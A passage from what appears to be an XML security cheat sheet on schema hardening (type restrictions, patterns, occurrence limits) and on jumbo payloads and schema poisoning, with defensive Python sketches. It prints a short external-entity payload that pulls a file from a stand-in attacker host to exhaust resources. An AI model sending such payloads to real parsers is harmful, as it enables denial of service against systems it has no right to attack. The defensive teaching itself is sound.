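A strict check of the whole value, rather than only its first portion, can be sketched in Python with the standard &lt;tt&gt;base64&lt;/tt&gt; module. The helper name &lt;tt&gt;is_strict_base64&lt;/tt&gt; is hypothetical, and the sketch is stricter than the schema type in one respect: it also rejects embedded whitespace, which &lt;tt&gt;base64Binary&lt;/tt&gt; tolerates.&lt;br /&gt;
&lt;br /&gt;
```python
import base64
import binascii


def is_strict_base64(text):
    """Return True only if the entire string is valid base64."""
    try:
        # validate=True rejects characters outside the base64 alphabet
        # instead of silently discarding them.
        base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True
```
&lt;br /&gt;
With this check, a value made of a valid base64 prefix followed by arbitrary characters is rejected as a whole.&lt;br /&gt;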
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &lt;tt&gt;quantity&lt;/tt&gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &lt;tt&gt;price*quantity&lt;/tt&gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid this logical vulnerability, the schema should use &lt;tt&gt;positiveInteger&lt;/tt&gt; instead of &lt;tt&gt;integer&lt;/tt&gt;.&lt;br /&gt;
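&lt;br /&gt;
The same restriction can be mirrored in application code as a second line of defense. The following Python sketch assumes the values arrive as strings; &lt;tt&gt;parse_positive_integer&lt;/tt&gt; and &lt;tt&gt;order_total&lt;/tt&gt; are hypothetical names, and the regular expression only approximates the lexical form of a positive integer (an optional plus sign followed by digits).&lt;br /&gt;
&lt;br /&gt;
```python
import re
from decimal import Decimal

# Optional plus sign followed by ASCII digits; no minus sign is accepted.
POSITIVE_INTEGER = re.compile(r"\+?[0-9]+")


def parse_positive_integer(text):
    """Convert text to an int, rejecting zero, negatives, and non-digits."""
    if POSITIVE_INTEGER.fullmatch(text) is None:
        raise ValueError("not a positive integer literal: %r" % text)
    value = int(text)
    if value == 0:
        raise ValueError("zero is not a positive integer")
    return value


def order_total(price_text, quantity_text):
    """Compute price*quantity only after the quantity has been checked."""
    return Decimal(price_text) * parse_positive_integer(quantity_text)
```
&lt;br /&gt;
A quantity of -1 or 0 now raises an error before any total is computed.&lt;br /&gt;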
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Because &lt;tt&gt;decimal&lt;/tt&gt; does not include &lt;tt&gt;Infinity&lt;/tt&gt; or &lt;tt&gt;NaN&lt;/tt&gt;, a price set to either value fails validation and is rejected before the application processes it. If those values were allowed, an attacker could exploit them.&lt;br /&gt;
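&lt;br /&gt;
Application code can be affected by the same special values. As a hedged illustration, Python's &lt;tt&gt;Decimal&lt;/tt&gt; constructor accepts strings such as NaN and Infinity, so a parser that relies on it has to reject them explicitly. The helper name &lt;tt&gt;parse_price&lt;/tt&gt; is hypothetical, and the sketch does not reproduce every lexical rule of the schema type (for instance, it still accepts exponent notation).&lt;br /&gt;
&lt;br /&gt;
```python
from decimal import Decimal, InvalidOperation


def parse_price(text):
    """Parse a price, rejecting NaN, Infinity, and non-numeric input."""
    try:
        value = Decimal(text)
    except InvalidOperation:
        raise ValueError("not a number: %r" % text)
    # Decimal happily parses the special values, so check explicitly.
    if not value.is_finite():
        raise ValueError("special value rejected: %r" % text)
    return value
```
&lt;br /&gt;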
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &lt;tt&gt;enumeration&lt;/tt&gt; in XML schema. The following example restricts the contents of the element &lt;tt&gt;month&lt;/tt&gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &lt;tt&gt;000-00-0000&lt;/tt&gt; and &lt;tt&gt;999-99-9999&lt;/tt&gt; will be allowed for an SSN.&lt;br /&gt;
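&lt;br /&gt;
A schema pattern must match the entire value. When the same check is repeated in application code, the regular expression has to be anchored explicitly. The following Python sketch uses &lt;tt&gt;fullmatch&lt;/tt&gt; for that purpose; the helper name &lt;tt&gt;is_valid_ssn&lt;/tt&gt; is hypothetical.&lt;br /&gt;
&lt;br /&gt;
```python
import re

# Same expression as the schema pattern for the SSN element.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(text):
    """Return True only if the whole string has the form NNN-NN-NNNN."""
    # fullmatch anchors both ends; search or match would accept extra text.
    return SSN_PATTERN.fullmatch(text) is not None
```
&lt;br /&gt;
Using an unanchored search instead would accept a value that merely contains a well-formed number somewhere inside a longer string.&lt;br /&gt;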
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined can have serious consequences when the application receives an extreme number of items to be processed. Two attributes specify minimum and maximum limits: &lt;tt&gt;minOccurs&lt;/tt&gt; and &lt;tt&gt;maxOccurs&lt;/tt&gt;. The default value for both the &lt;tt&gt;minOccurs&lt;/tt&gt; and the &lt;tt&gt;maxOccurs&lt;/tt&gt; attributes is &lt;tt&gt;1&lt;/tt&gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &lt;tt&gt;minOccurs&lt;/tt&gt; of 0, and if there is no limit on the maximum amount, it could contain a &lt;tt&gt;maxOccurs&lt;/tt&gt; of &lt;tt&gt;unbounded&lt;/tt&gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &lt;tt&gt;operation&lt;/tt&gt;, which can contain an unlimited (&lt;tt&gt;unbounded&lt;/tt&gt;) number of &lt;tt&gt;buy&lt;/tt&gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &lt;tt&gt;unbounded&lt;/tt&gt; value.&lt;br /&gt;
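&lt;br /&gt;
Where the schema cannot be changed, the application can enforce its own ceiling. The following Python sketch assumes the document has already been parsed into an ElementTree element; the limit of 100 and the names &lt;tt&gt;MAX_BUY_ELEMENTS&lt;/tt&gt;, &lt;tt&gt;within_occurrence_limit&lt;/tt&gt;, and &lt;tt&gt;build_operation&lt;/tt&gt; are hypothetical.&lt;br /&gt;
&lt;br /&gt;
```python
import xml.etree.ElementTree as ET

# Hypothetical ceiling; choose it from the capacity of the real application.
MAX_BUY_ELEMENTS = 100


def within_occurrence_limit(operation, limit=MAX_BUY_ELEMENTS):
    """Return True if operation holds between 1 and limit buy children."""
    count = len(operation.findall("buy"))
    return count >= 1 and limit >= count


def build_operation(number_of_orders):
    """Build an operation element with the given number of buy children."""
    operation = ET.Element("operation")
    for _ in range(number_of_orders):
        ET.SubElement(operation, "buy")
    return operation
```
&lt;br /&gt;
Note that this check runs after parsing, so it limits the work done by the application but not the memory used by the parser itself.&lt;br /&gt;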
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
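&lt;br /&gt;
One conservative defense against this payload is to refuse any document that carries a document type declaration. The following Python sketch uses the standard &lt;tt&gt;xml.parsers.expat&lt;/tt&gt; module; the names &lt;tt&gt;DoctypeForbidden&lt;/tt&gt; and &lt;tt&gt;parse_without_doctype&lt;/tt&gt; are hypothetical, and the approach assumes the application never needs a DTD, since harmless declarations are rejected as well.&lt;br /&gt;
&lt;br /&gt;
```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_without_doctype(data):
    """Parse data with expat, aborting as soon as a DOCTYPE starts."""
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here stops parsing before any entity is declared or fetched.
        raise DoctypeForbidden("DOCTYPE declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(data, True)
```
&lt;br /&gt;
Because the parser stops at the start of the declaration, the external entity is never resolved.&lt;br /&gt;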
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &lt;tt&gt;note&lt;/tt&gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &lt;tt&gt;note.dtd&lt;/tt&gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
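&lt;br /&gt;
A deployment check for this condition could be sketched in Python as follows. It assumes a POSIX filesystem, and the helper name &lt;tt&gt;is_world_writable&lt;/tt&gt; is hypothetical.&lt;br /&gt;
&lt;br /&gt;
```python
import os
import stat


def is_world_writable(path):
    """Return True if users outside the owner and group may write to path."""
    # filemode renders the mode like the ls listing, for example -rw-rw-rw-
    mode_text = stat.filemode(os.stat(path).st_mode)
    # Index 8 holds the write flag of the final (other users) triplet.
    return mode_text[8] == "w"
```
&lt;br /&gt;
An application could refuse to load a local schema for which this check returns true.&lt;br /&gt;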
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and tamper with the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
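&lt;br /&gt;
An application that must fetch remote schemas could at least refuse plain-text locations. This is a minimal Python sketch under that assumption; &amp;lt;tt&amp;gt;uses_encrypted_transport&amp;lt;/tt&amp;gt; is a hypothetical helper, and the check only rules out unencrypted HTTP, not the other poisoning scenarios in this section:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def uses_encrypted_transport(schema_url):
    """Return True only when the schema URL uses the https scheme."""
    return urlsplit(schema_url).scheme == "https"


# The location used in the example above would be rejected:
# uses_encrypted_transport("http://example.com/note.dtd") returns False
```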
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
